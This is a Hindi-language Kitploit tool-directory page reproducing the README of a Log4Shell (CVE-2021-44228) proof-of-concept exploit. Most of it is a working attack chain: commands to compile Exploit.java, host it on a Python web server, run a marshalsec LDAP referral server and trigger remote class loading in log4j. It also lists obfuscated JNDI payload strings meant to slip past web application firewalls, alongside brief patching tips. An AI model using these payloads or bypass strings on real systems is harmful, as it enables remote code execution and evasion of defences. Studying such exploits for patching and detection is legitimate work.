Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-44228 — यह Log4j RCE एक्सप्लॉइट https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce से उत्पन्न हुआ है। | Kitploit
उपकरण/GitHubGitHub/roxas-tan/cve-2021-44228
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणWAF बाईपासरिमोट एक्सेस टूल
GitHubroxas-tan/cve-2021-44228

CVE-2021-44228

यह Log4j RCE एक्सप्लॉइट https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce से उत्पन्न हुआ है।

रिपॉजिटरी देखें
107114 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-44228 (Apache Log4j दूरस्थ कोड निष्पादन)

सभी log4j-core संस्करण >=2.0-beta9 और <=2.14.1

1.x संस्करण में अन्य कमजोरियाँ हैं, नवीनतम संस्करण में अपडेट करने की अनुशंसा की जाती है।

Log4Shell (CVE-2021-44228) से जुड़े सुरक्षा परामर्श / बुलेटिन

उपयोग:

इस प्रोजेक्ट को डाउनलोड करें, एक्सप्लॉइट कोड को कंपाइल करें blob/master/src/main/java/Exploit.java, और संकलित बाइनरी को डाउनलोड करने की अनुमति देने के लिए एक वेबसर्वर शुरू करें।

root@kitploit:~
git clone https://github.com/roxas-tan/CVE-2021-44228.git
cd CVE-2021-44228

javac Exploit.java

# start webserver
# For Python2
python -m SimpleHTTPServer 8888
# For Python3
python3 -m http.server 8888

# make sure the python webserver is running in the same directory as Exploit.class, to test
  curl -I 127.0.0.1:8888/Exploit.class

एक और प्रोजेक्ट डाउनलोड करें और JNDI संदर्भ लौटाने वाला LDAP सर्वर इम्प्लीमेंटेशन* चलाएँ https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/jndi/LDAPRefServer.java

root@kitploit:~
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
# Java 8 required
mvn clean package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

एक्टिवेशन कोड बिल्ड करें और चलाएँ (एक कमजोर java वेब सर्वर पर log4j हमले का अनुकरण करें) blob/master/src/main/java/log4j.java, और आपका कैलकुलेटर ऐप दिखाई देगा।

root@kitploit:~
cd CVE-2021-44228
mvn clean package
java -cp target/log4j-rce-1.0-SNAPSHOT-all.jar log4j

# Expect the following
# 1. calculator app appears
# 2. in ldapserver console,
#  Send LDAP reference result for Exploit redirecting to http://127.0.0.1:8888/Exploit.class
# 3. in webserver console,
#  127.0.0.1 - - [....] "GET /Exploit.class HTTP/1.1" 200 -

टिप्स:

आपको बचाने के लिए वर्तमान Java संस्करण पर भरोसा न करें। Log4 को अपडेट करें (या JNDI lookup हटाएँ)। विस्तार को अक्षम करें (वैसे भी यह काफी बुरा विचार लगता है)।

rc1 को बायपास करें

उदाहरण के लिए:

root@kitploit:~
${jndi:ldap://127.0.0.1:1389/ badClassName}

WAF को बायपास करें

root@kitploit:~
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

वेब एप्लिकेशन फ़ायरवॉल पर भरोसा न करें।

भेद्यता का विवरण

Lookups, Log4j कॉन्फ़िगरेशन में किसी भी स्थान पर मान जोड़ने का एक तरीका प्रदान करते हैं।

Lookups

finally में लीक पैदा करने के तरीके

root@kitploit:~
LogManager.getLogger().error()
LogManager.getLogger().fatal()
टूल डाउनलोड करें